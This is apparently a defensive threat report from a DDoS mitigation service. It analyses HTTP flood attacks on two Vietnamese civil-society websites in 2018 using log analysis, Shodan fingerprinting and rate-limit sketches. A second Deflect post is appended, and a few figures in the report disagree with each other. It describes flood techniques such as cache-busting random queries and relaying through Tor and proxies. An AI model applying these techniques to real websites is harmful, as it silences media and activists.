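UA = "Mozilla/5.0 (Windows NT 6.1; rv:52.0) Gecko/20100101 Firefox/52.0"

suspects = set()
for line in open(sys.argv[1]):
    if UA not in line:
        continue
    if '"POST /wp-login.php' in line or '"GET /?author=' in line:
        suspects.add(line.split()[0])  # client IP is the first field

print(f"{len(suspects)} suspicious IPs found")
```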
As with our last report, we have decided not to share the public IP addresses used by this botnet, as they are likely compromised systems and we cannot control the potential side-effects that sharing these IPs would have on their owners. We are open to sharing them privately. We are aware of the challenges of sharing DDoS threat intelligence and are interested in starting a discussion about this topic. Please contact us at outreach AT equalit.ie.
We identified 10 different DDoS attacks targeting two Vietnamese websites protected by Deflect, viettan.org and baotiengdan.com, between the 17th of April and the 15th of June 2018. These attacks happened in the context of a serious lack of Internet freedom in Vietnam, with regular online attacks against activists and independent media.
We sorted these attacks into four different groups sharing the same Tactics, Techniques, and Procedures (TTPs). Group A comprises 6 different attacks, against both viettan.org and baotiengdan.com, which tends to show that these two websites have common enemies even though they have different political perspectives.
We found common IPs between this group and a DDoS attack analyzed by Qurium in June 2018 against Vietnamese independent media websites luatkhoa.org and thevietnamese.org. Having four different Vietnamese civil society websites targeted by DDoS in the same period supports the hypothesis that these attacks are part of a coordinated action to silence NGOs and independent media in Vietnam.
For each of the attacks covered in this report, we have investigated their origin and the systems used as relays.
Introduction
This blog post is the first in a series called “News from Deflect” intended to describe attacks on Deflect protected websites, with the objective of continuing discussions about distributed denial of service (DDoS) attacks against civil society.
Deflect is a free DDoS mitigation service for civil society organizations (see our Terms of Service to understand who fits this description). Our platform filters traffic between users and civil society websites to remove malicious requests, in this case bots trying to overload systems in order to make a website unavailable and silence political groups or independent media.
We have been protecting two Vietnamese websites, viettan.org and baotiengdan.com, on the Deflect platform. Việt Tân is an organization seeking to establish democracy through political reforms in Vietnam. Tiếng Dân is an independent, non-partisan online media outlet covering political news in Vietnam.
Over the past several months, we have seen a significant increase in DDoS attacks against these two websites. Although the Việt Tân and Tiếng Dân websites and organizations are not related in any way and have different political perspectives, our investigations uncovered several attacks targeting them simultaneously. It appeared to us that these attacks were driven by a coordinated campaign, and we sought the websites' agreement to publish an overview of the discovered activities.
Figure 1: heatmap of DDoS incidents against Việt Tân and Tiếng Dân websites over the past months
Internet and Media Freedom in Vietnam
For more than a decade, there has been evidence of online attacks against Vietnamese civil society. The earliest attacks we know of focused on silencing websites, either with DDoS attacks, like those against the Bauxite Vietnam website in December 2009 and January 2010 or against Việt Tân in August 2011, or by compromising their platforms, as witnessed with Anh Ba Sam in 2013.
In 2013, the discovery by Citizen Lab of FinFisher servers installed in Vietnam indicated malware operations against activists and journalists. In March 2013, the managing editor of baotiengdan.com, Thu Ngoc Dinh, at that time managing editor of Anh Ba Sam, had her computer compromised and her personal pictures published online. Later that year, the Electronic Frontier Foundation documented a targeted malware operation against Vietnamese activists and journalists. This attack is now attributed to a group called OceanLotus (or APT32) that is considered to be Vietnam-based. Recently, an attack targeting more than 80 websites of civil society organizations (Human rights, independent media, individual bloggers, religious groups) was uncovered by Volexity in November 2017 and attributed to this same Ocean Lotus group.
At the same time, there is strong suppression of independent media in Vietnam. Several articles in the Vietnamese constitution criminalize online publications opposing the Socialist Republic of Vietnam. They have regularly been used to threaten and convict activists, like the blogger Nguyen Ngoc Nhu Quynh, alias 'Mother Mushroom', who was sentenced to 10 years in jail in June 2017 for distorting government policies and defaming the communist regime in Facebook posts. Recently, Vietnamese legislators approved a cyber-security law requiring large IT companies like Facebook or Google to store personal data on Vietnamese users locally. This law has met strong opposition, from street protests to human rights groups like Human Rights Watch and Amnesty International.
Since the 17th of April 2018, we have identified 10 different DDoS attacks targeting either Việt Tân's or Tiếng Dân's websites:
#  | Date       | Target
1  | 2018/04/17 | viettan.org
2  | 2018/04/17 | baotiengdan.com
3  | 2018/05/04 | viettan.org
4  | 2018/05/09 | viettan.org
5  | 2018/05/09 | baotiengdan.com
6  | 2018/05/23 | baotiengdan.com
7  | 2018/06/07 | baotiengdan.com
8  | 2018/06/10 | baotiengdan.com
9  | 2018/06/12 | viettan.org
10 | 2018/06/15 | baotiengdan.com
These attacks were all HTTP flood attacks, but they came from different sources and with different characteristics (user agents, paths requested, etc.).
Identifying Groups of Attacks
From the beginning of the analysis, we saw some similarities between the different attacks, mainly in the user agents used by the bots and in the paths requested, so we set out to identify groups of attacks sharing the same Tactics, Techniques and Procedures (TTPs).
We first described their characteristics in the following table:
id | Target          | Start time          | End time            | #IP  | #Hits     | Path           | User Agent                                          | Query String
1  | viettan.org     | 2018-04-17 08:20:00 | 2018-04-17 09:10:00 | 294  | 63 830    | /              | One random UA per IP                                | None
2  | baotiengdan.com | 2018-04-17 08:30:00 | 2018-04-17 10:00:00 | 568  | 33 589    | /              | One random UA per IP                                | None
3  | viettan.org     | 2018-04-28 00:00:00 | 2018-05-04 15:00:00 | 5001 | 2 257 509 | / or /spip.php | Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2) | if spip, /spip.php?page=email&id_article=10283
4  | viettan.org     | 2018-05-09 02:30:00 | 2018-05-09 03:20:00 | 217  | 58 271    | /              | One UA per IP                                       | None
5  | baotiengdan.com | 2018-05-09 08:30:00 | 2018-05-09 11:30:00 | 725  | 235 157   | /              | One or several UA per IP                            | None
6  | baotiengdan.com | 2018-05-23 15:00:00 | 2018-05-24 09:30:00 | 557  | 2 957 065 | /              | One random UA per IP                                | None
7  | baotiengdan.com | 2018-06-07 01:45:00 | 2018-06-07 05:30:00 | 70   | 17 131    | /              | One random UA per IP                                | None
8  | baotiengdan.com | 2018-06-10 05:45:00 | 2018-06-11 06:30:00 | 349  | 5 214 730 | /              | python-requests/2.9.1                               | ?&s=nguyenphutrong and random queries
9  | viettan.org     | 2018-06-12 05:00:00 | 2018-06-12 06:30:00 | 1    | 9 978     | /              | 329 different user agents                           | Random, like ?x=%99%94%7E%85%7B%7E%8D%96
10 | baotiengdan.com | 2018-06-15 13:00:00 | 2018-06-15 23:00:00 | 1    | 518 899   | /              | python-requests/2.9.1                               | ?s=nguyenphutrong
From this table, we can see that incidents 8 and 10 clearly use the same tool, identified by the user agent (python-requests/2.9.1), and make the same specific query, /?&s=nguyenphutrong, based on the name of Nguyễn Phú Trọng, the current General Secretary of the Communist Party of Vietnam. We gathered these two attacks into Group C.
Incidents 3 and 9 have characteristics that differ from the other incidents; they seem to use two different custom-made DDoS tools. We separated them into two different groups, B and D (see details in part 2).
That leaves 6 attacks that share common characteristics, but not enough to confirm any link between them. They all query / without any query string, which is quite common in DDoS attacks, and they use random user-agents, one per IP address, which is close to what legitimate traffic looks like.
Identifying shared IPs
We wanted to check whether these different attacks shared IP addresses, so we represented both IPs and incidents in a Gephi graph to visualize the links between them (IPs are shown as red dots and incidents as green dots in the following figure):
We identified six incidents sharing common IPs in their botnets, presented in the following table of incident IP intersections:
Incidents | Number of IPs | Intersection IPs | % of total botnet IPs
6 & 1     | 557 & 294     | 5                | 1.70 %
6 & 4     | 557 & 217     | 6                | 2.76 %
6 & 7     | 557 & 70      | 3                | 4.29 %
6 & 5     | 557 & 725     | 8                | 1.44 %
6 & 2     | 557 & 568     | 1                | 0.18 %
1 & 4     | 294 & 217     | 1                | 0.46 %
1 & 7     | 294 & 70      | 2                | 2.86 %
1 & 5     | 294 & 725     | 9                | 3.06 %
1 & 2     | 294 & 568     | 155              | 52.72 %
4 & 7     | 217 & 70      | 2                | 2.86 %
4 & 5     | 217 & 725     | 14               | 6.45 %
4 & 2     | 217 & 568     | 1                | 0.46 %
7 & 5     | 70 & 725      | 1                | 1.43 %
7 & 2     | 70 & 568      | 1                | 1.43 %
5 & 2     | 725 & 568     | 22               | 3.87 %
There is a strong overlap between the bots used in incidents 1 and 2 (53%), which is telling considering that incident 1 targeted viettan.org and incident 2 targeted baotiengdan.com. It is a strong indication that a similar botnet was used to attack these two domains, particularly as the attacks were orchestrated at the same time on April 17th.
The other attacks all share between 1 and 22 IP addresses (<10%), which is quite a small intersection and may have different explanations: for instance, the same system being compromised by several different malware families and thus belonging to several botnets, or different compromised systems sitting behind the same public IP.
Identifying origin countries
Another link to consider is whether the IPs used in the different attacks come from the same countries. If we consider a botnet that uses a specific method to infect end systems, its bots are likely to be unevenly distributed over the world: a phishing attack in one language would be more effective in countries speaking that language, and an Internet-wide scan for vulnerable routers would compromise more devices in countries where the targeted router is common.
We geolocated these IPs using the MaxMind GeoLite database and represented the origins in the following graph (countries with less than 5% of IPs are categorized as "Other" for visibility):
Besides incident 7, these attacks clearly share the same profile: between 15 and 30% of IPs are from India, between 5 and 10% from Indonesia, then the Philippines or Malaysia. Surprisingly, incident 7 has only one IP coming from India (categorized as Other in this graph) but a similar distribution across the other countries, so the distributions seem quite similar overall.
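The geolocation step itself is easy to reproduce; a minimal sketch assuming a local copy of MaxMind's free GeoLite2 Country database and placeholder IPs:

```python
# Minimal sketch: per-country counts of bot IPs using GeoLite2.
from collections import Counter

import geoip2.database  # pip install geoip2
import geoip2.errors

ips = ["198.51.100.7", "203.0.113.9"]  # placeholder bot IPs

counts = Counter()
with geoip2.database.Reader("GeoLite2-Country.mmdb") as reader:
    for ip in ips:
        try:
            counts[reader.country(ip).country.name] += 1
        except geoip2.errors.AddressNotFoundError:
            counts["Unknown"] += 1

for country, n in counts.most_common():
    print(f"{n:5d} {country}")
```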
Analyzing User-Agents
Another interesting characteristic of these attacks is that every IP uses a single user agent for all of its requests, presumably selected from a predefined list. We listed the user-agents used in the different incidents and checked the similarity between these lists:
Incidents | Number of UA | Number of identical UA | Percentage
6 & 2     | 68 & 40      | 29                     | 72.50 %
6 & 1     | 68 & 54      | 32                     | 59.26 %
6 & 5     | 68 & 97      | 40                     | 58.82 %
6 & 4     | 68 & 57      | 32                     | 56.14 %
6 & 7     | 68 & 38      | 34                     | 89.47 %
2 & 1     | 40 & 54      | 23                     | 57.50 %
2 & 5     | 40 & 97      | 27                     | 67.50 %
2 & 4     | 40 & 57      | 17                     | 42.50 %
2 & 7     | 40 & 38      | 27                     | 71.05 %
1 & 5     | 54 & 97      | 32                     | 59.26 %
1 & 4     | 54 & 57      | 29                     | 53.70 %
1 & 7     | 54 & 38      | 28                     | 73.68 %
5 & 4     | 97 & 57      | 34                     | 59.65 %
5 & 7     | 97 & 38      | 31                     | 81.58 %
4 & 7     | 57 & 38      | 24                     | 63.16 %
Between 42 and 89% of user-agents are shared between any two of these incidents. The lower intersections could be due either to different versions of the same tool being used in different attacks, or to interference from legitimate traffic.
15 different user agents were used in all of the 6 incidents:
User-Agent | Description
Mozilla/5.0 (Windows NT 5.1; rv:5.0.1) Gecko/20100101 Firefox/5.0.1 | Firefox 5 on Windows XP
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.116 Safari/537.36 | Chrome 53 on Windows 10
Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.116 Safari/537.36 | Chrome 53 on Windows 7
Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36 | Chrome 45 on Windows 7
Mozilla/5.0 (Windows NT 6.3; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0 | Firefox 41 on Windows 8.1
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36 | Chrome 63 on Windows 10
Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0 | Firefox 41 on Windows 7
Mozilla/5.0 (Windows NT 6.0) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1 | Chrome 13 on Windows Vista
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.116 Safari/537.36 | Chrome 53 on Mac OS X (El Capitan)
Mozilla/5.0 (Windows NT 6.1; WOW64; rv:13.0) Gecko/20100101 Firefox/13.0.1 | Firefox 13 on Windows 7
Mozilla/5.0 (Windows NT 6.1; rv:5.0) Gecko/20100101 Firefox/5.02 | Firefox 5 on Windows 7
Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 | Chrome 63 on Windows 7
Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.116 Safari/537.36 | Chrome 53 on Windows 10
Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko | Internet Explorer 11 on Windows 7
Analyzing Traffic Features
For a long time, we have been using visualization and machine learning tools to analyze DDoS attacks (for instance in the report on attacks against Black Lives Matter). We find it more reliable to consider information about the whole session of an IP (all the requests made by that IP over a period of time) rather than individual requests, so we generate features describing each IP session and then visualize and cluster these IPs to identify bots. This approach is really useful for confirming the links between these different attacks. Here we rely on the following four features to compare the sessions from the different groups (a sketch of the feature extraction follows the list):
Number of different user-agents used
Number of different query strings done
Number of different paths queried
Size of the requests
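A hedged sketch of this feature extraction (our production pipeline differs; the record fields here are assumptions about an already-parsed log):

```python
# Hedged sketch: aggregate parsed requests into one feature vector per
# IP session, mirroring the four features listed above.
from collections import defaultdict

def session_features(records):
    sessions = defaultdict(list)
    for rec in records:
        sessions[rec["ip"]].append(rec)
    return {
        ip: {
            "n_user_agents": len({r["user_agent"] for r in reqs}),
            "n_query_strings": len({r["query"] for r in reqs}),
            "n_paths": len({r["path"] for r in reqs}),
            "mean_size": sum(r["size"] for r in reqs) / len(reqs),
        }
        for ip, reqs in sessions.items()
    }

# A bot hammering "/" with one UA yields low, flat feature values.
records = [
    {"ip": "203.0.113.5", "path": "/", "query": "",
     "user_agent": "Mozilla/5.0 ...", "size": 215},
]
print(session_features(records))
```

These per-session vectors are what we then feed to visualization and clustering to separate bots from legitimate visitors.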
First, we can clearly see that incident 8 has an identifiable signature due to its use of a specially crafted tool generating random user agents and random query strings (1058 query strings and 329 user-agents):
For the other attacks, the identification is not as clear, mainly because some IPs seem to make both legitimate visits to the website and attack requests at the same time. But for most of the IPs, we clearly see that the number of query strings and the payload size are discriminant:
Summary of the Different Attack Groups
Overall, we identified four different groups of attacks sharing the same TTPs:
#  | Date       | Target          | Attack Group
1  | 2018/04/17 | viettan.org     | Group A
2  | 2018/04/17 | baotiengdan.com | Group A
3  | 2018/05/04 | viettan.org     | Group B
4  | 2018/05/09 | viettan.org     | Group A
5  | 2018/05/09 | baotiengdan.com | Group A
6  | 2018/05/23 | baotiengdan.com | Group A
7  | 2018/06/07 | baotiengdan.com | Group A
8  | 2018/06/10 | baotiengdan.com | Group C
9  | 2018/06/12 | viettan.org     | Group D
10 | 2018/06/15 | baotiengdan.com | Group C
Let's go into the details of the TTPs for each group:
Group A: TTPs for this group seem quite generic and we have only moderate confidence that the attacks are linked. All of these attacks query / (which is pretty common) with one user agent per IP (often an empty user agent). The IPs in this group come from Asia, mostly India, Indonesia, the Philippines or Malaysia. Attacks in this group often reuse the same user-agents, which could indicate several versions of the same payload.
Group B: this attack used the user-agent Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2) to query either GET / or POST /spip.php?page=email&id_article=10283.
Group C: two attacks with the user-agent python-requests/2.9.1 (showing the use of a Python script with the requests library), querying either /?&s=nguyenphutrong or a random search term like /?s=06I44M.
Group D: one attack with a tool using a random value from a list of 329 user-agents, and random query strings (like ?x=%99%94%7E%85%7B%7E%8D%96) to bypass caching.
Analyzing Attack Groups
Group A
Group A attacks were by far the most frequent case we saw since April, with six different attacks against both Việt Tân's and Tiếng Dân's websites.
Two simultaneous incidents
On the 9th of May, for instance, we saw a peak of banned IPs, first in attacks against viettan.org, then against baotiengdan.com:
We can confirm that there was also a peak of traffic to both websites:
Looking at the traffic more closely, we see that most of the IPs generating the bulk of the traffic only make requests to the / path. For example, the IP 61.90.38.XXX made 4253 GET requests to / over 30 minutes with the user agent Mozilla/5.0 (Windows NT 6.1; WOW64; rv:13.0) Gecko/20100101 Firefox/13.0.1 (this user agent corresponds to Firefox 13 on Windows 7; Firefox 13 was released in April 2012, so it is pretty unlikely that anyone still uses it today):
We identified as bots all the IPs displaying an unusual number of queries to / (more than 90% of their traffic), and ended up with a list of 217 IPs targeting viettan.org and 725 IPs targeting baotiengdan.com, with 14 in common between the two incidents.
Checking where these IPs are located, we can see that they are mainly in India and Indonesia:
Top 10 countries:
243 India
138 Indonesia
61 Philippines
34 Morocco
34 Pakistan
29 Thailand
27 Brazil
22 Vietnam
19 Algeria
19 Egypt
Analyzing the source of these incidents
We then wanted to understand the source of these incidents, for which we had four major hypotheses:
We aggregated the 2212 IP addresses from these 6 incidents and identified their Autonomous Systems. To distinguish between servers and Internet access connections, we used ipinfo.io's classification of Autonomous Systems:
1988 ISP
163 business
38 hosting
23 Unknown
This set of IPs therefore mostly comes from personal Internet access networks around the world, through either compromised routers or compromised end-devices. For a long time, most botnets were comprised of compromised Windows systems infected through worms, phishing or backdoored applications. Since 2016 and the appearance of the Mirai botnet, it is clear that Internet-of-Things botnets are becoming more and more common, and we now regularly see compromised routers or digital cameras used for DDoS attacks.
The main difference between these two cases is that IoT systems are reachable from the Internet and often compromised through open ports. To differentiate them, we used data from the Shodan database. Shodan is a platform that regularly scans all IPv4 addresses, looking for specific ports (many of them specific to IoT devices) and storing the results in a database that can be queried through their search engine or their API. We implemented a script that queries the Shodan API and applies signatures to the results to fingerprint the system running at an IP address. For instance, MikroTik routers often expose a telnet, SNMP or web server showing the brand of the router; our script downloads the Shodan data for an IP and checks it against different MikroTik signatures. Shodan provides historical data for these scans, so we included data from the past 6 months for each IP to maximize the information available for fingerprinting.
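The published script is more thorough, but the core idea fits in a few lines; a hedged sketch using the official shodan Python library (the signature strings here are illustrative, not our full rule set):

```python
# Hedged sketch: fingerprint an IP from Shodan banners, including
# historical scan results, by matching device brand strings.
import shodan  # pip install shodan

api = shodan.Shodan("YOUR_API_KEY")

SIGNATURES = {"MikroTik": "router", "RouterOS": "router", "DVR": "dvr"}

def fingerprint(ip):
    try:
        host = api.host(ip, history=True)  # include past scan data
    except shodan.APIError:
        return "no data"
    for banner in host.get("data", []):
        text = str(banner.get("data", "")) + str(banner.get("product", ""))
        for needle, kind in SIGNATURES.items():
            if needle in text:
                return kind
    return "unknown"

print(fingerprint("203.0.113.5"))  # placeholder IP
```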
There are definite limitations to this approach, as a MikroTik router could itself be secure while routing traffic from a compromised end-system. Our hypothesis, however, is that in the case of an IoT botnet we would identify similar routers or IoT systems for a large share of the IP addresses.
By running this script over the 2212 IP addresses of Group A, we identified 381 routers and 77 Digital Video Recorders, among other devices. 1666 of the IPs did not have any open port according to Shodan, which tends to show that they were not servers but rather professional or personal Internet access points. So in the end, our main hypothesis is that these IPs are mostly compromised end-systems (most likely Windows systems).
Regarding location, we used the free MaxMind GeoIP database to identify the source countries, and found that 50% of the IPs are located in India, Indonesia, Brazil, the Philippines, and Pakistan.
Group B
The second group was responsible for one DDoS attack against viettan.org, from the 29th of April to the 4th of May, using 5000 different IP addresses:
The attack tool has specific characteristics:
All bots used the same User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2)
Bots queried only two different paths:
GET /
POST /spip.php?page=email&id_article=10283 (this targets a page of the SPIP web framework, possibly exploiting a known SPIP vulnerability, which is curious as viettan.org does not run SPIP)
If we look at the Autonomous System of each IP, we see that 97.7% of them come from AS4134, which belongs to the state-owned company China Telecom and provides Internet access in China:
We fingerprinted the systems using the Shodan-based tool described in 2.1, and identified 901 systems as routers (884 of them MikroTik routers) and 512 systems as servers (mostly Windows and Ubuntu servers).
It is interesting to see MikroTik routers here, as many people observed botnets compromising MikroTik routers back in March this year by exploiting known vulnerabilities. Still, those 884 MikroTik routers only represent 17.6% of the total number of IPs involved in this attack. Our main hypothesis is that this botnet is mostly comprised of compromised end-systems (likely Windows or Android); it is also possible that it mixes compromised end-systems with compromised MikroTik routers.
The most surprising specificity of this botnet is that it comes almost entirely from one Autonomous System, AS4134, which is not common in DDoS attacks (most of the time bots are distributed over different countries). A third hypothesis is that this traffic could come from traffic injection by the Internet Service Provider, causing clients to make requests to this website. Such an attack has been documented once, by Citizen Lab in their 2015 China's Great Cannon report on the attacks against github.com and GreatFire.org. We consider this hypothesis unlikely, as that 2015 attack is the only documented case of its kind, and it would require collaboration between the Vietnamese groups likely behind these attacks and this Chinese state-owned Internet provider, for a costly attack with little to no impact on the targeted website.
Group C
The third group consists of two attacks targeting baotiengdan.com, on the 10th and the 15th of June, using a specially crafted tool. We first identified it on the 10th of June 2018, when a peak of traffic created issues on the website. We quickly noticed an important number of requests made from different IPs, all with the same user agent, python-requests/2.9.1.
Over 5 million requests were made that day by 349 IP addresses. In order to bypass Deflect's caching, the bots were configured to query the search page, half of them with the same query, /?&s=nguyenphutrong, a search for the name of Nguyễn Phú Trọng, the current General Secretary of the Communist Party of Vietnam. The other half of the bots made random search queries like ?s=046GYH or ?s=04B9BV.
These 349 IPs were distributed across different countries (top 10 shown here):
56 United States
43 Germany
35 Netherlands
30 France
17 Romania
16 Canada
12 Switzerland
11 China
10 Russia
9 Bangladesh
Looking more closely at the hosts, we identified that 180 of them are actually Tor exit nodes (the list of Tor exit nodes is public). We used the same Shodan-based fingerprinting technique to identify the other hosts and found that 89 of them are routers (mostly MikroTik routers) and 51 are servers:
This mix of routers and servers is confirmed by the ipinfo.io AS classification of the non-Tor IPs:
68 ISP
52 Hosting
42 Business
7 Unknown
So this attack used two different types of relays at the same time: the Tor network and compromised systems, routers or servers.
The second attack by this group was surprisingly different: we identified a peak of traffic on the 15th of June, again on baotiengdan.com, coming from a single IP, 66.70.255.195, which made 560 030 requests over one day:
This traffic definitely came from the same attack group, as it used the same user agent (python-requests/2.9.1) and requested the same page, /?s=nguyenphutrong.
The IP 66.70.255.195 is an open HTTP proxy located in the OVH network in Montreal and listed in different proxy databases (like proxydb or proxyservers). It is surprising to see an HTTP proxy used here considering the heavy attack done 5 days earlier by the same group: using an open HTTP proxy brings anonymity, but it also caps the attack at the proxy's bandwidth (in this case, 5000 requests per minute at its maximum). Our hypothesis is that a group of people with different skills and resources are sharing the same tool to target baotiengdan.com. It is also possible that one person or group is trying different attacks to see which is the most effective.
Group D
The fourth group consists of only one attack, coming from an IP address in Vietnam on the 12th of June 2018, when we saw a peak of requests from the IP 113.189.169.XXX on the website viettan.org:
This attack had the following characteristics:
Querying / with a random query string (like ?%7F) in order to avoid Deflect caching
Using a random user agent from a list of 329 user-agent values
These are pretty distinctive characteristics that we had not seen in other attacks before. The IP address belongs to AS45899, managed by the state-owned Vietnam Posts and Telecommunications Group. It seems to be a standard domestic or business Internet connection in Haiphong, Vietnam. Considering the low level of the attack, it is entirely possible that it came from an individual using their personal or professional Internet access.
Links with other attacks
On the 10th of July, Qurium published a report about DDoS attacks on the 11th of June 2018 against two other Vietnamese websites, luatkhoa.org and thevietnamese.org. Luật Khoa tạp chí is an online media outlet covering legal topics and human rights in Vietnamese. The Vietnamese is an independent online magazine aiming to raise awareness of the human rights situation and politics in Vietnam among the international community.
Qurium compared with us the lists of IPs responsible for most of the traffic during this DDoS attack, and we found that 4 of these IPs were also used in incidents 1, 5, 6 and 7, all part of Group A.
Comparing the list of user-agents given in their article with the lists used in the Group A incidents, we see that between 22 and 42 percent are similar:
Compared with incident | Number of UA | Number of similar UA | Percentage
1                      | 54 & 42      | 16                   | 38.10 %
2                      | 42 & 40      | 9                    | 22.50 %
4                      | 57 & 42      | 15                   | 35.71 %
5                      | 97 & 42      | 18                   | 42.86 %
6                      | 68 & 42      | 14                   | 33.33 %
7                      | 42 & 38      | 11                   | 28.95 %
As described before, it is hard to attribute these attacks to the same group, but they definitely share similar TTPs. Seeing DDoS attacks with similar TTPs used during the same period to target four different political groups' or independent media websites confirms the coordinated nature of these attacks, and a particular interest in attacking Vietnamese media and civil society groups.
Mitigation
Our mitigation system uses the Banjax tool, an Apache Traffic Server plugin we wrote to identify and ban bots based on traffic patterns; for instance, we ban IP addresses making too many queries to /. This approach is efficient in most cases, but not when the DDoS comes from many hosts that each stay under Banjax's thresholds. Half of these incidents were mitigated automatically by our Banjax rules. For the other incidents, we had to manually add new rules to Banjax or enable the Banjax JavaScript challenge, which requires browsers to compute mathematical operations before being allowed to access the website (hence blocking all automated tools that do not implement JavaScript).
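The rate-limiting idea behind those rules can be illustrated with a sliding-window counter; a hedged sketch with hypothetical thresholds, not Banjax's actual implementation:

```python
# Illustrative sketch: ban an IP once it exceeds a request threshold
# to "/" within a sliding time window (values are hypothetical).
import time
from collections import defaultdict, deque

WINDOW = 60.0    # seconds
THRESHOLD = 100  # max requests to "/" per window

hits = defaultdict(deque)
banned = set()

def observe(ip, path, now=None):
    """Record a request; return True if the IP is (now) banned."""
    if ip in banned or path != "/":
        return ip in banned
    now = time.time() if now is None else now
    q = hits[ip]
    q.append(now)
    while q and now - q[0] > WINDOW:
        q.popleft()
    if len(q) > THRESHOLD:
        banned.add(ip)
    return ip in banned
```

As noted above, a botnet that spreads its load across thousands of IPs can stay under any such per-IP threshold, which is why the JavaScript challenge is the fallback.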
Overall, these attacks caused limited downtime on the targeted websites, and when downtime did occur, we worked in collaboration with Việt Tân and Tiếng Dân to mitigate it as soon as possible.
Conclusion
In this report, we presented the attacks that have targeted Việt Tân's and Tiếng Dân's websites since mid-April this year. It shows that distributed denial of service attacks are still a threat to civil society in Vietnam, and that DDoS is still used to silence political groups and independent media online.
On a technical level, HTTP flooding is still commonly used for DDoS and remains quite effective against websites without filtering solutions. Investigating the origin of these attacks is an ongoing mission for us, and we are constantly looking for new ways to understand and classify them better.
One objective of publishing these reports is to foster collaboration around the analysis of DDoS attacks against civil society. If you have seen similar attacks, or if you are working to protect civil society organizations against them, please get in touch with us at outreach AT equalit.ie
Acknowledgements
We would like to thank Việt Tân and Tiếng Dân for their help and collaboration during this investigation. Thanks to ipinfo.io for their support.
Appendix
Indicators Of Compromise
It is common to publicly share Indicators of Compromise (IOCs) in attack reports. Sharing IOCs related to DDoS attacks is more challenging, as these attacks are often done through relays (whether proxies or compromised systems), so sharing lists of IP addresses can have side-effects on victims that we cannot control. We have therefore decided not to share IOCs publicly, but we are open to sharing them privately with organizations or individuals who could be targeted by the same groups. Please contact us at outreach AT equalit.ie.
Fingerprinting systems based on Shodan data
As described earlier in this report, we have developed a script to fingerprint systems based on Shodan data. This script is published on GitHub and released under the MIT license. Feel free to open issues or submit pull requests.
This is the fifth year of Deflect operations and an opportune time to draw some conclusions from the past and provide a round of feedback to our many users and peers. We fought and won several hundred battles with various distributed denial of service and social engineering attacks against us and our clients, expanding the Deflect offering of open source mitigation solutions to include website hosting and attack analytics. However, several important missteps were made along the way, and this post will concentrate on lessons learned and the way forward in our battle to reduce the prevalence of DDoS as an all too common technique to silence online voices.
Our reflections and this post were motivated by an external evaluation report of the Distributed Deflect service, which you can read in this PDF. The project itself was a technical long shot and an ambitious community building exercise; lessons learned from this endeavor are summarized within. It's about a 10 minute read 🙂
During peak times on Deflect throughout 2012-2016, we served an average of 3 million unique daily readers while battling simultaneous DDoS attacks against several clients. The network served websites continuously for the entire 3 1/4 years of the project's duration, recording less than 30 minutes of downtime in total. The project had a direct impact on over four hundred independent media, human rights and democracy building organizations.
Over three hundred and fifty websites passed through the Deflect protection service. These websites ranged in size and popularity, receiving anything between a dozen daily readers and over a million. Our open door policy meant that websites that changed their mind about Deflect protection were free to leave, unhindered in any way. Over the course of the project, we mitigated over four hundred DDoS attacks and served approximately 1% of Internet users each calendar year (according to our records correlated against Internet World Statistics). Our work also appeared in topical and mainstream media.
Aside from the DDoS protection service, we trained numerous website administrators in web security principles, worked with several small and medium ISPs to set up their own Deflect infrastructure and enabled Internet presence for key organizations and movements involved in national and international events, including the ’13 election in Iran, ’14 elections in Ukraine, Iguala mass kidnapping, Panama papers, and Black Lives Matter among others.
Distributed Deflect
As attacks grew in size, we debated the long-term existence of the project and decided to prototype an in-kind DDoS mitigation service, whereby websites receiving free protection, and any volunteers, could join and expand the mitigation network's size and scope. We wanted to create a service run by the people it protected. The hypothesis envisioned the world's first participatory botnet infrastructure, whereby the network would be sustained by around a hundred servers run by the Deflect project and several thousand volunteer nodes. Our past experience showed that the best way to mitigate a botnet attack was with a distributed solution, utilizing the design of the Internet to nullify an attack that no single endpoint could handle by itself. Distributed Deflect brought together people of various backgrounds and competencies, blending software development and technical service provision, customer support and outreach, documentation and communications. We designed, prototyped and brought into production the core components of a distributed volunteer infrastructure, only to realize that the hypothesis behind our proposal could not scale if we were to maintain the privacy and security of all participants in our network.
An infrastructure that accepted voluntary (untrusted) network resources had to introduce checks for content accuracy and confidentiality; otherwise a malicious node could not only see who was doing what on the Deflect network, but also delete or change content as it passed through their machine. Our solution was to encrypt web pages as they left the origin server and deliver them to readers as an encrypted bundle, with an additional authentication snippet sent by another node for verification. Volunteer nodes would only cache encrypted information and would not be able to replace it with alternative content.
All the necessary infrastructure design and software tools to implement this model were built to specification. However, once the system was ready for production and undergoing testing, we realized the error in the hypothesis made at the onset: encrypted bundles grew in size, as all page fonts and various third-party libraries (which make up the majority of web pages today and are usually stored in the browser's cache) had to be included in each bundle.
